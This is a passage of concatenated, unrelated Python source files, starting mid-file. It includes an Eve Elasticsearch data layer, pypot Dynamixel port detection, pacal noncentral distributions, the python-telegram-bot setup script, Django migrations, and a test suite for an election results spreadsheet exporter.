        self.comp.start()
        self.comp.stop()
        
        #######################################################################
        # Simulate regular component shutdown
        self.comp.releaseObject()
        
    # TODO Add additional tests here
    #
    # See:
    #   ossie.utils.bulkio.bulkio_helpers,
    #   ossie.utils.bluefile.bluefile_helpers
    # for modules that will assist with testing components with BULKIO ports
    
if __name__ == "__main__":
    ossie.utils.testing.main("../sig_source_i.spd.xml") # By default tests all implementations

# -*- coding: utf-8 -*-
"""
Created on Wed Jul  6 22:58:00 2016

@author: Diogo
"""

# -*- coding: utf-8 -*-
"""
Created on Sun Jun 26 19:08:00 2016

@author: Diogo
"""
def ImportGames():
	games = list()
	user_games = dict()

	with open('C:\\Users\\Diogo\\Documents\\Monografia FIA\\UserGamesCleansed.txt', 'r', encoding = 'utf-8') as lines:
		
		next(lines) # Skiping headers
		
		for ln in lines:
			user, board_game, board_type, list_type, score10 = ln.split('##')
			
			if board_game not in games:
				games.append(board_game.replace('\t',' ').replace('  ', ' '))
				
			if user not in user_games:
				user_games[user] = dict()

			if board_game not in user_games[user].keys():
				user_games[user][board_game] = 1
			
	return (games, user_games)
	
games, user_games = ImportGames()

def BuildMatrix(games, user_games):
	with open('C:\\Users\\Diogo\\Documents\\Monografia FIA\\UserGamesMatrix.tab', 'a', encoding = 'utf-8') as lines:
		lines.write('user\t' + '\t'.join(games) + '\n')
	
	for user in user_games:
		user_line = list()
		
		for game in games:
			
			if game in user_games[user].keys():
				user_line.append('1')
			else:
				user_line.append('0')
		
		with open('C:\\Users\\Diogo\\Documents\\Monografia FIA\\UserGamesMatrix.tab', 'a', encoding = 'utf-8') as lines:
			lines.write(user + '\t' + '\t'.join(user_line) + '\n')
		
BuildMatrix(games, user_games)
# -*- coding: utf-8 -*-

from django.contrib import admin

from models import FileMapping

# Register your models here.

admin.site.register(FileMapping)



import ast
import json
import arrow
import elasticsearch

from bson import ObjectId
from flask import request
from eve.utils import config
from eve.io.base import DataLayer

try:
    from urllib.parse import urlparse
except ImportError:
    from urlparse import urlparse


def parse_date(date_str):
    """Parse elastic datetime string."""
    try:
        date = arrow.get(date_str)
    except TypeError:
        date = arrow.get(date_str[0])
    return date.datetime


def get_dates(schema):
    """Return list of datetime fields for given schema."""
    dates = [config.LAST_UPDATED, config.DATE_CREATED]
    for field, field_schema in schema.items():
        if field_schema['type'] == 'datetime':
            dates.append(field)
    return dates


def format_doc(hit, schema, dates):
    """Format given doc to match given schema."""
    doc = hit.get('_source', {})
    doc.setdefault(config.ID_FIELD, hit.get('_id'))
    doc.setdefault('_type', hit.get('_type'))

    for key in dates:
        if key in doc:
            doc[key] = parse_date(doc[key])

    return doc


def noop():
    pass


def is_elastic(datasource):
    """Detect if given resource uses elastic."""
    return datasource.get('backend') == 'elastic' or datasource.get('search_backend') == 'elastic'


class ElasticJSONSerializer(elasticsearch.JSONSerializer):
    """Customize the JSON serializer used in Elastic"""
    def default(self, value):
        """Convert mongo.ObjectId."""
        if isinstance(value, ObjectId):
            return str(value)
        return super(ElasticJSONSerializer, self).default(value)


class ElasticCursor(object):
    """Search results cursor."""

    no_hits = {'hits': {'total': 0, 'hits': []}}

    def __init__(self, hits=None, docs=None):
        """Parse hits into docs."""
        self.hits = hits if hits else self.no_hits
        self.docs = docs if docs else []

    def __getitem__(self, key):
        return self.docs[key]

    def first(self):
        """Get first doc."""
        return self.docs[0] if self.docs else None

    def count(self, **kwargs):
        """Get hits count."""
        return int(self.hits['hits']['total'])

    def extra(self, response):
        """Add extra info to response."""
        if 'facets' in self.hits:
            response['_facets'] = self.hits['facets']
        if 'aggregations' in self.hits:
            response['_aggregations'] = self.hits['aggregations']


def set_filters(query, base_filters):
    """Put together all filters we have and set them as 'and' filter
    within filtered query.

    :param query: elastic query being constructed
    :param base_filters: all filters set outside of query (eg. resource config, sub_resource_lookup)
    """
    filters = [f for f in base_filters if f is not None]
    query_filter = query['query']['filtered'].get('filter', None)
    if query_filter is not None:
        if 'and' in query_filter:
            filters.extend(query_filter['and'])
        else:
            filters.append(query_filter)
    if filters:
        query['query']['filtered']['filter'] = {'and': filters}


def set_sort(query, sort):
    query['sort'] = []
    for (key, sortdir) in sort:
        sort_dict = dict([(key, 'asc' if sortdir > 0 else 'desc')])
        query['sort'].append(sort_dict)


def get_es(url):
    o = urlparse(url)
    es = elasticsearch.Elasticsearch(hosts=[{'host': o.hostname, 'port': o.port}])
    es.transport.serializer = ElasticJSONSerializer()
    return es


def get_indices(es):
    return elasticsearch.client.IndicesClient(es)


class Elastic(DataLayer):
    """ElasticSearch data layer."""

    serializers = {
        'integer': int,
        'datetime': parse_date,
        'objectid': ObjectId,
    }

    def init_app(self, app):
        app.config.setdefault('ELASTICSEARCH_URL', 'http://localhost:9200/')
        app.config.setdefault('ELASTICSEARCH_INDEX', 'eve')

        self.index = app.config['ELASTICSEARCH_INDEX']
        self.es = get_es(app.config['ELASTICSEARCH_URL'])

        self.create_index(self.index)
        self.put_mapping(app)

    def _get_field_mapping(self, schema):
        """Get mapping for given field schema."""
        if 'mapping' in schema:
            return schema['mapping']
        elif schema['type'] == 'datetime':
            return {'type': 'date'}
        elif schema['type'] == 'string' and schema.get('unique'):
            return {'type': 'string', 'index': 'not_analyzed'}

    def create_index(self, index=None):
        if index is None:
            index = self.index
        try:
            get_indices(self.es).create(self.index)
        except elasticsearch.TransportError:
            pass

    def put_mapping(self, app):
        """Put mapping for elasticsearch for current schema.

        It's not called automatically now, but rather left for user to call it whenever it makes sense.
        """

        indices = get_indices(self.es)

        for resource, resource_config in app.config['DOMAIN'].items():
            datasource = resource_config.get('datasource', {})

            if not is_elastic(datasource):
                continue

            if datasource.get('source', resource) != resource:  # only put mapping for core types
                continue

            properties = {}
            properties[config.DATE_CREATED] = self._get_field_mapping({'type': 'datetime'})
            properties[config.LAST_UPDATED] = self._get_field_mapping({'type': 'datetime'})

            for field, schema in resource_config['schema'].items():
                field_mapping = self._get_field_mapping(schema)
                if field_mapping:
                    properties[field] = field_mapping

            mapping = {'properties': properties}
            indices.put_mapping(index=self.index, doc_type=resource, body=mapping, ignore_conflicts=True)

    def find(self, resource, req, sub_resource_lookup):
        args = getattr(req, 'args', request.args if request else {})
        source_config = config.SOURCES[resource]

        if args.get('source'):
            query = json.loads(args.get('source'))
            if 'filtered' not in query.get('query', {}):
                _query = query.get('query')
                query['query'] = {'filtered': {}}
                if _query:
                    query['query']['filtered']['query'] = _query
        else:
            query = {'query': {'filtered': {}}}

        if args.get('q', None):
            query['query']['filtered']['query'] = _build_query_string(args.get('q'),
                                                                      default_field=args.get('df', '_all'))

        if 'sort' not in query:
            if req.sort:
                sort = ast.literal_eval(req.sort)
                set_sort(query, sort)
            elif self._default_sort(resource) and 'query' not in query['query']['filtered']:
                set_sort(query, self._default_sort(resource))

        if req.max_results:
            query.setdefault('size', req.max_results)

        if req.page > 1:
            query.setdefault('from', (req.page - 1) * req.max_results)

        filters = []
        filters.append(source_config.get('elastic_filter'))
        filters.append(source_config.get('elastic_filter_callback', noop)())
        filters.append({'term': sub_resource_lookup} if sub_resource_lookup else None)
        filters.append(json.loads(args.get('filter')) if 'filter' in args else None)
        set_filters(query, filters)

        if 'facets' in source_config:
            query['facets'] = source_config['facets']

        if 'aggregations' in source_config:
            query['aggs'] = source_config['aggregations']

        args = self._es_args(resource)
        hits = self.es.search(body=query, **args)
        return self._parse_hits(hits, resource)

    def find_one(self, resource, req, **lookup):

        def is_found(hit):
            if 'exists' in hit:
                hit['found'] = hit['exists']
            return hit.get('found', False)

        args = self._es_args(resource)

        if config.ID_FIELD in lookup:
            try:
                hit = self.es.get(id=lookup[config.ID_FIELD], **args)
            except elasticsearch.NotFoundError:
                return

            if not is_found(hit):
                return

            docs = self._parse_hits({'hits': {'hits': [hit]}}, resource)
            return docs.first()
        else:
            query = {
                'query': {
                    'term': lookup
                }
            }

            try:
                args['size'] = 1
                hits = self.es.search(body=query, **args)
                docs = self._parse_hits(hits, resource)
                return docs.first()
            except elasticsearch.NotFoundError:
                return

    def find_one_raw(self, resource, _id):
        args = self._es_args(resource)
        hit = self.es.get(id=_id, **args)
        return self._parse_hits({'hits': {'hits': [hit]}}, resource).first()

    def find_list_of_ids(self, resource, ids, client_projection=None):
        args = self._es_args(resource)
        return self._parse_hits(self.es.multi_get(ids, **args), resource)

    def insert(self, resource, doc_or_docs, **kwargs):
        ids = []
        kwargs.update(self._es_args(resource))
        for doc in doc_or_docs:
            doc.update(self.es.index(body=doc, id=doc.get('_id'), **kwargs))
            ids.append(doc['_id'])
        get_indices(self.es).refresh(self.index)
        return ids

    def update(self, resource, id_, updates):
        args = self._es_args(resource, refresh=True)
        return self.es.update(id=id_, body={'doc': updates}, **args)

    def replace(self, resource, id_, document):
        args = self._es_args(resource, refresh=True)
        return self.es.index(body=document, id=id_, **args)

    def remove(self, resource, lookup=None):
        args = self._es_args(resource)
        if lookup:
            try:
                return self.es.delete(id=lookup.get('_id'), refresh=True, **args)
            except elasticsearch.NotFoundError:
                return
        else:
            query = {'query': {'match_all': {}}}
            return self.es.delete_by_query(body=query, **args)

    def is_empty(self, resource):
        args = self._es_args(resource)
        res = self.es.count(body={'query': {'match_all': {}}}, **args)
        return res.get('count', 0) == 0

    def get_mapping(self, index, doc_type=None):
        return get_indices(self.es).get_mapping(index=index, doc_type=doc_type)

    def _parse_hits(self, hits, resource):
        """Parse hits response into documents."""
        datasource = self._datasource(resource)
        schema = config.DOMAIN[datasource[0]]['schema']
        dates = get_dates(schema)
        docs = []
        for hit in hits.get('hits', {}).get('hits', []):
            docs.append(format_doc(hit, schema, dates))
        return ElasticCursor(hits, docs)

    def _es_args(self, resource, refresh=None):
        """Get index and doctype args."""
        datasource = self._datasource(resource)
        args = {
            'index': self.index,
            'doc_type': datasource[0],
            }
        if refresh:
            args['refresh'] = refresh
        return args

    def _fields(self, resource):
        """Get projection fields for given resource."""
        datasource = self._datasource(resource)
        keys = datasource[2].keys()
        return ','.join(keys) + ','.join([config.LAST_UPDATED, config.DATE_CREATED])

    def _default_sort(self, resource):
        datasource = self._datasource(resource)
        return datasource[3]


def build_elastic_query(doc):
    """
    Builds a query which follows ElasticSearch syntax from doc.
    1. Converts {"q":"cricket"} to the below elastic query
    {
        "query": {
            "filtered": {
                "query": {
                    "query_string": {
                        "query": "cricket",
                        "lenient": false,
                        "default_operator": "AND"
                    }
                }
            }
        }
    }

    2. Converts a faceted query
    {"q":"cricket", "type":['text'], "source": "AAP"}
    to the below elastic query
    {
        "query": {
            "filtered": {
                "filter": {
                    "and": [
                        {"terms": {"type": ["text"]}},
                        {"term": {"source": "AAP"}}
                    ]
                },
                "query": {
                    "query_string": {
                        "query": "cricket",
                        "lenient": false,
                        "default_operator": "AND"
                    }
                }
            }
        }
    }

    :param doc: A document object which is inline with the syntax specified in the examples.
                It's the developer responsibility to pass right object.
    :returns ElasticSearch query
    """

    elastic_query, filters = {"query": {"filtered": {}}}, []

    for key in doc.keys():
        if key == 'q':
            elastic_query['query']['filtered']['query'] = _build_query_string(doc['q'])
        else:
            _value = doc[key]
            filters.append({"terms": {key: _value}} if isinstance(_value, list) else {"term": {key: _value}})

    set_filters(elastic_query, filters)
    return elastic_query


def _build_query_string(q, default_field=None):
    """
    Builds "query_string" object from 'q'.

    :param: q of type String
    :param: default_field
    :return: dictionary object.
    """

    query_string = {'query_string': {'query': q, 'default_operator': 'AND'}}
    query_string['query_string'].update({'lenient': False} if default_field else {'default_field': default_field})

    return query_string

import platform
import glob

from .io import DxlIO, Dxl320IO, DxlError
from .error import BaseErrorHandler
from .controller import BaseDxlController
from .motor import DxlMXMotor, DxlAXRXMotor, DxlXL320Motor

from ..robot import Robot


def _get_available_ports():
    """ Tries to find the available usb2serial port on your system. """
    if platform.system() == 'Darwin':
        return glob.glob('/dev/tty.usb*')

    elif platform.system() == 'Linux':
        return glob.glob('/dev/ttyACM*') + glob.glob('/dev/ttyUSB*')

    elif platform.system() == 'Windows':
        import _winreg
        import itertools

        ports = []
        path = 'HARDWARE\\DEVICEMAP\\SERIALCOMM'
        key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, path)

        for i in itertools.count():
            try:
                ports.append(str(_winreg.EnumValue(key, i)[1]))
            except WindowsError:
                return ports

    return []


def get_available_ports(only_free=False):
    ports = _get_available_ports()

    if only_free:
        ports = list(set(ports) - set(DxlIO.get_used_ports()))

    return ports


def find_port(ids, strict=True):
    """ Find the port with the specified attached motor ids.

        :param list ids: list of motor ids to find
        :param bool strict: specify if all ids should be find (when set to False, only half motor must be found)

        .. warning:: If two (or more) ports are attached to the same list of motor ids the first match will be returned.

    """
    for port in get_available_ports():
        for DxlIOCls in (DxlIO, Dxl320IO):
            try:
                with DxlIOCls(port) as dxl:
                    founds = len(dxl.scan(ids))

                    if strict and founds == len(ids):
                        return port

                    if not strict and founds >= len(ids) / 2:
                        return port
            except DxlError:
                continue

    raise IndexError('No suitable port found for ids {}!'.format(ids))


def autodetect_robot():
    """ Creates a :class:`~pypot.robot.robot.Robot` by detecting dynamixel motors on all available ports. """
    motor_controllers = []

    for port in get_available_ports():
        for DxlIOCls in (DxlIO, Dxl320IO):
            dxl_io = DxlIOCls(port)
            ids = dxl_io.scan()

            if not ids:
                dxl_io.close()
                continue

            models = dxl_io.get_model(ids)

            motorcls = {
                'MX': DxlMXMotor,
                'RX': DxlAXRXMotor,
                'AX': DxlAXRXMotor,
                'XL': DxlXL320Motor
            }

            motors = [motorcls[model[:2]](id, model=model)
                      for id, model in zip(ids, models)]

            c = BaseDxlController(dxl_io, motors)
            motor_controllers.append(c)

    return Robot(motor_controllers)

from numpy import sqrt

from pacal.standard_distr import NormalDistr, ChiSquareDistr
from pacal.distr import Distr, SumDistr, DivDistr, InvDistr
from pacal.distr import sqrt as distr_sqrt

class NoncentralTDistr(DivDistr):
    def __init__(self, df = 2, mu = 0):
        d1 = NormalDistr(mu, 1)
        d2 = distr_sqrt(ChiSquareDistr(df) / df)
        super(NoncentralTDistr, self).__init__(d1, d2)
        self.df = df
        self.mu = mu
    def __str__(self):
        return "NoncentralTDistr(df={0},mu={1})#{2}".format(self.df, self.mu, self.id())
    def getName(self):
        return "NoncT({0},{1})".format(self.df, self.mu)

class NoncentralChiSquareDistr(SumDistr):
    def __new__(cls, df, lmbda = 0):
        assert df >= 1
        d1 = NormalDistr(sqrt(lmbda))**2
        if df == 1:
            return d1
        d2 = ChiSquareDistr(df - 1)
        ncc2 = super(NoncentralChiSquareDistr, cls).__new__(cls, d1, d2)
        super(NoncentralChiSquareDistr, ncc2).__init__(d1, d2)
        ncc2.df = df
        ncc2.lmbda = lmbda
        return ncc2
    def __init__(self, df, lmbda = 0):
        pass
    def __str__(self):
        return "NoncentralChiSquare(df={0},lambda={1})#{2}".format(self.df, self.lmbda, self.id())
    def getName(self):
        return "NoncChi2({0},{1})".format(self.df, self.lmbda)

class NoncentralBetaDistr(InvDistr):
    def __init__(self, alpha = 1, beta = 1, lmbda = 0):
        d = 1 + ChiSquareDistr(2.0 * beta) / NoncentralChiSquareDistr(2 * alpha, lmbda)
        super(NoncentralBetaDistr, self).__init__(d)
        self.alpha = alpha
        self.beta = beta
        self.lmbda = lmbda
    def __str__(self):
        return "NoncentralBetaDistr(alpha={0},beta={1},lambda={2})#{3}".format(self.alpha, self.beta, self.lmbda, self.id())
    def getName(self):
        return "NoncBeta({0},{1},{2})".format(self.alpha, self.beta, self.lmbda)
    
class NoncentralFDistr(DivDistr):
    def __init__(self, df1 = 1, df2 = 1, lmbda = 0):
        d1 = NoncentralChiSquareDistr(df1, lmbda) / df1
        d2 = ChiSquareDistr(df2) / df2
        super(NoncentralFDistr, self).__init__(d1, d2)
        self.df1 = df1
        self.df2 = df2
        self.lmbda = lmbda
    def __str__(self):
        return "NoncentralFDistr(df1={0},df2={1},lambda={2})#{3}".format(self.df1, self.df2, self.lmbda, self.id())
    def getName(self):
        return "NoncF({0},{1},{2})".format(self.df1, self.df2, self.lmbda)

from ert.cwrap import CWrapper, BaseCClass
from ert.enkf import ENKF_LIB
from ert.util import StringList


class SummaryKeyMatcher(BaseCClass):

    def __init__(self):
        c_ptr = SummaryKeyMatcher.cNamespace().alloc()

        super(SummaryKeyMatcher, self).__init__(c_ptr)

    def addSummaryKey(self, key):
        assert isinstance(key, str)
        return SummaryKeyMatcher.cNamespace().add_key(self, key)

    def __len__(self):
        return SummaryKeyMatcher.cNamespace().size(self)

    def __contains__(self, key):
        return SummaryKeyMatcher.cNamespace().match_key(self, key)

    def isRequired(self, key):
        """ @rtype: bool """
        return SummaryKeyMatcher.cNamespace().is_required(self, key)

    def keys(self):
        """ @rtype: StringList """
        return SummaryKeyMatcher.cNamespace().keys(self)

    def free(self):
        SummaryKeyMatcher.cNamespace().free(self)


cwrapper = CWrapper(ENKF_LIB)
cwrapper.registerObjectType("summary_key_matcher", SummaryKeyMatcher)

SummaryKeyMatcher.cNamespace().alloc  = cwrapper.prototype("c_void_p summary_key_matcher_alloc()")
SummaryKeyMatcher.cNamespace().free  = cwrapper.prototype("void summary_key_matcher_free(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().size  = cwrapper.prototype("int summary_key_matcher_get_size(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().add_key  = cwrapper.prototype("void summary_key_matcher_add_summary_key(summary_key_matcher, char*)")
SummaryKeyMatcher.cNamespace().match_key  = cwrapper.prototype("bool summary_key_matcher_match_summary_key(summary_key_matcher, char*)")
SummaryKeyMatcher.cNamespace().keys  = cwrapper.prototype("stringlist_obj summary_key_matcher_get_keys(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().is_required  = cwrapper.prototype("bool summary_key_matcher_summary_key_is_required(summary_key_matcher, char*)")

#!/usr/bin/python
# coding: utf8

import os
import subprocess
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}'.commands.base import BaseCommand
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}' import PROJECT_DIR


class Configure(BaseCommand):
    def execute(self):
        os.chdir(os.path.join(PROJECT_DIR, 'build'))
        subprocess.run(['cmake', PROJECT_DIR])

#!/usr/bin/env python
"""The setup and build script for the python-telegram-bot library."""

import codecs
import os
from setuptools import setup, find_packages


def requirements():
    """Build the requirements list for this project"""
    requirements_list = []

    with open('requirements.txt') as requirements:
        for install in requirements:
            requirements_list.append(install.strip())

    return requirements_list


packages = find_packages(exclude=['tests*'])

with codecs.open('README.rst', 'r', 'utf-8') as fd:
    fn = os.path.join('telegram', 'version.py')
    with open(fn) as fh:
        code = compile(fh.read(), fn, 'exec')
        exec(code)

    setup(name='python-telegram-bot',
          version=__version__,
          author='Leandro Toledo',
          author_email='devs@python-telegram-bot.org',
          license='LGPLv3',
          url='https://python-telegram-bot.org/',
          keywords='python telegram bot api wrapper',
          description="We have made you a wrapper you can't refuse",
          long_description=fd.read(),
          packages=packages,
          install_requires=requirements(),
          extras_require={
              'json': 'ujson',
              'socks': 'PySocks'
          },
          include_package_data=True,
          classifiers=[
              'Development Status :: 5 - Production/Stable',
              'Intended Audience :: Developers',
              'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)',
              'Operating System :: OS Independent',
              'Topic :: Software Development :: Libraries :: Python Modules',
              'Topic :: Communications :: Chat',
              'Topic :: Internet',
              'Programming Language :: Python',
              'Programming Language :: Python :: 2',
              'Programming Language :: Python :: 2.7',
              'Programming Language :: Python :: 3',
              'Programming Language :: Python :: 3.3',
              'Programming Language :: Python :: 3.4',
              'Programming Language :: Python :: 3.5',
              'Programming Language :: Python :: 3.6'
          ],)

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('account', '0003_remove_userprofile_is_check'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='userprofile',
            name='is_create',
        ),
        migrations.RemoveField(
            model_name='userprofile',
            name='is_delete',
        ),
        migrations.RemoveField(
            model_name='userprofile',
            name='is_modify',
        ),
    ]

import io

import openpyxl

from django.test import (
    Client, TestCase
)
from django.urls import reverse

from core.models import (
    User, Batch, Section, Election, Candidate, CandidateParty,
    CandidatePosition, Vote, VoterProfile, Setting, UserType
)


class ResultsExporter(TestCase):
    """
    Tests the results xlsx exporter view.

    This subview may only process requests from logged in admin users. Other
    users will be redirected to '/'. This will also only accept GET requests.

    GET requests may have an election`parameter whose value must be the id
    of an election. The lack of an election parameter will result in the
    results of all elections to be exported, with each election having its
    own worksheet. Other URL parameters will be ignored. Invalid election
    parameter values, e.g. non-existent election IDs and non-integer parameters,
    will return an error message.

    View URL: '/results/export'
    """
    @classmethod
    def setUpTestData(cls):
        batch_num = 0
        section_num = 0
        voter_num = 0
        party_num = 0
        position_num = 0
        candidate_num = 0
        num_elections = 2
        voters = list()
        positions = dict()
        for i in range(num_elections):
            election = Election.objects.create(name='Election {}'.format(i))
            positions[str(election.name)] = list()

            num_batches = 2
            for j in range(num_batches):
                batch = Batch.objects.create(year=batch_num, election=election)
                batch_num += 1

                num_sections = 2 if j == 0 else 1
                for k in range(num_sections):
                    section = Section.objects.create(
                        section_name=str(section_num)
                    )
                    section_num += 1

                    num_students = 2
                    for l in range(num_students):
                        voter = User.objects.create(
                            username='user{}'.format(voter_num),
                            first_name=str(voter_num),
                            last_name=str(voter_num),
                            type=UserType.VOTER
                        )
                        voter.set_password('voter')
                        voter.save()
                        voter_num += 1

                        VoterProfile.objects.create(
                            user=voter,
                            batch=batch,
                            section=section
                        )

                        voters.append(voter)

            num_positions = 3
            for i in range(num_positions):
                position = CandidatePosition.objects.create(
                    position_name='Position {}'.format(position_num),
                    election=election
                )

                positions[str(election.name)].append(position)

                position_num += 1

            num_parties = 3
            for j in range(num_parties):
                party = CandidateParty.objects.create(
                    party_name='Party {}'.format(party_num),
                    election=election
                )
                party_num += 1

                if j != 2:  # Let every third party have no candidates.
                    num_positions = 3
                    for k in range(num_positions):
                        position = positions[str(election.name)][k]

                        candidate = Candidate.objects.create(
                            user=voters[candidate_num],
                            party=party,
                            position=position,
                            election=election
                        )

                        Vote.objects.create(
                            user=voters[candidate_num],
                            candidate=candidate,
                            election=election
                        )

                        candidate_num += 1

        # Let's give one candidate an additional vote to really make sure that
        # we all got the correct number of votes.
        Vote.objects.create(
            user=voters[0],
            # NOTE: The voter in voter[1] is a Position 1 candidate of
            #       Party 1, where the voter in voter[0] is a member.
            candidate=Candidate.objects.get(user=voters[1]),
            election=Election.objects.get(name='Election 0')
        )

        _admin = User.objects.create(username='admin', type=UserType.ADMIN)
        _admin.set_password('root')
        _admin.save()

    def setUp(self):
        self.client.login(username='admin', password='root')

    def test_anonymous_get_requests_redirected_to_index(self):
        self.client.logout()

        response = self.client.get(reverse('results-export'), follow=True)
        self.assertRedirects(response, '/?next=%2Fadmin%2Fresults')

    def test_voter_get_requests_redirected_to_index(self):
        self.client.logout()
        self.client.login(username='user0', password='voter')

        response = self.client.get(reverse('results-export'), follow=True)
        self.assertRedirects(response, reverse('index'))

    def test_get_all_elections_xlsx(self):
        response = self.client.get(reverse('results-export'))

        self.assertEqual(response.status_code, 200)

        self.assertEqual(
            response['Content-Disposition'],
            'attachment; filename="Election Results.xlsx"'
        )

        wb = openpyxl.load_workbook(io.BytesIO(response.content))

        self.assertEqual(len(wb.worksheets), 2)

        # Check first worksheet.
        ws = wb.worksheets[0]

        self.assertEqual(wb.sheetnames[0], 'Election 0')

        row_count = ws.max_row
        col_count = ws.max_column
        self.assertEqual(row_count, 25)
        self.assertEqual(col_count, 5)

        self.assertEqual(str(ws.cell(1, 1).value), 'Election 0 Results')

        self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')

        cellContents = [
            'Position 0',
            'Party 0',
            '0, 0',
            'Party 1',
            '3, 3',
            'Party 2',
            'None',
            'Position 1',
            'Party 0',
            '1, 1',
            'Party 1',
            '4, 4',
            'Party 2',
            'None',
            'Position 2',
            'Party 0',
            '2, 2',
            'Party 1',
            '5, 5',
            'Party 2',
            'None'
        ]
        for cellIndex, content in enumerate(cellContents, 5):
            self.assertEqual(str(ws.cell(cellIndex, 1).value), content) 

        self.assertEqual(str(ws.cell(2, 2).value), 'Number of Votes')

        self.assertEqual(str(ws.cell(3, 2).value), '0')

        self.assertEqual(str(ws.cell(4, 2).value), '0') # Section

        self.assertEqual(str(ws.cell(7, 2).value), '1')
        self.assertEqual(str(ws.cell(9, 2).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 2).value), '2')
        self.assertEqual(str(ws.cell(16, 2).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 2).value), '0')
        self.assertEqual(str(ws.cell(23, 2).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(4, 3).value), '1') # Section

        self.assertEqual(str(ws.cell(7, 3).value), '0')
        self.assertEqual(str(ws.cell(9, 3).value), '1')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 3).value), '0')
        self.assertEqual(str(ws.cell(16, 3).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 3).value), '1')
        self.assertEqual(str(ws.cell(23, 3).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 4).value), '1')

        self.assertEqual(str(ws.cell(4, 4).value), '2') # Section

        self.assertEqual(str(ws.cell(7, 4).value), '0')
        self.assertEqual(str(ws.cell(9, 4).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 4).value), '0')
        self.assertEqual(str(ws.cell(16, 4).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 4).value), '0')
        self.assertEqual(str(ws.cell(23, 4).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 5).value), 'Total Votes')
        self.assertEqual(str(ws.cell(7, 5).value), '1')
        self.assertEqual(str(ws.cell(9, 5).value), '1')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 5).value), '2')
        self.assertEqual(str(ws.cell(16, 5).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 5).value), '1')
        self.assertEqual(str(ws.cell(23, 5).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        # Check second worksheet.
        ws = wb.worksheets[1]

        self.assertEqual(wb.sheetnames[1], 'Election 1')

        row_count = ws.max_row
        col_count = ws.max_column
        self.assertEqual(row_count, 25)
        self.assertEqual(col_count, 5)

        self.assertEqual(str(ws.cell(1, 1).value), 'Election 1 Results')

        self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')

        self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')

        cellContents = [
            'Position 3',
            'Party 3',
            '6, 6',
            'Party 4',
            '9, 9',
            'Party 5',
            'None',
            'Position 4',
            'Party 3',
            '7, 7',
            'Party 4',
            '10, 10',
            'Party 5',
            'None',
            'Position 5',
            'Party 3',
            '8, 8',
            'Party 4',
            '11, 11',
            'Party 5',
            'None'
        ]
        for cellIndex, content in enumerate(cellContents, 5):
            self.assertEqual(str(ws.cell(cellIndex, 1).value), content) 

        self.assertEqual(str(ws.cell(2, 2).value), 'Number of Votes')

        self.assertEqual(str(ws.cell(3, 2).value), '2')

        self.assertEqual(str(ws.cell(4, 2).value), '3') # Section

        self.assertEqual(str(ws.cell(7, 2).value), '1')
        self.assertEqual(str(ws.cell(9, 2).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 2).value), '1')
        self.assertEqual(str(ws.cell(16, 2).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 2).value), '0')
        self.assertEqual(str(ws.cell(23, 2).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(4, 3).value), '4') # Section

        self.assertEqual(str(ws.cell(7, 3).value), '0')
        self.assertEqual(str(ws.cell(9, 3).value), '1')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 3).value), '0')
        self.assertEqual(str(ws.cell(16, 3).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 3).value), '1')
        self.assertEqual(str(ws.cell(23, 3).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 4).value), '3')

        self.assertEqual(str(ws.cell(4, 4).value), '5') # Section

        self.assertEqual(str(ws.cell(7, 4).value), '0')
        self.assertEqual(str(ws.cell(9, 4).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 4).value), '0')
        self.assertEqual(str(ws.cell(16, 4).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 4).value), '0')
        self.assertEqual(str(ws.cell(23, 4).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 5).value), 'Total Votes')
        self.assertEqual(str(ws.cell(7, 5).value), '1')
        self.assertEqual(str(ws.cell(9, 5).value), '1')
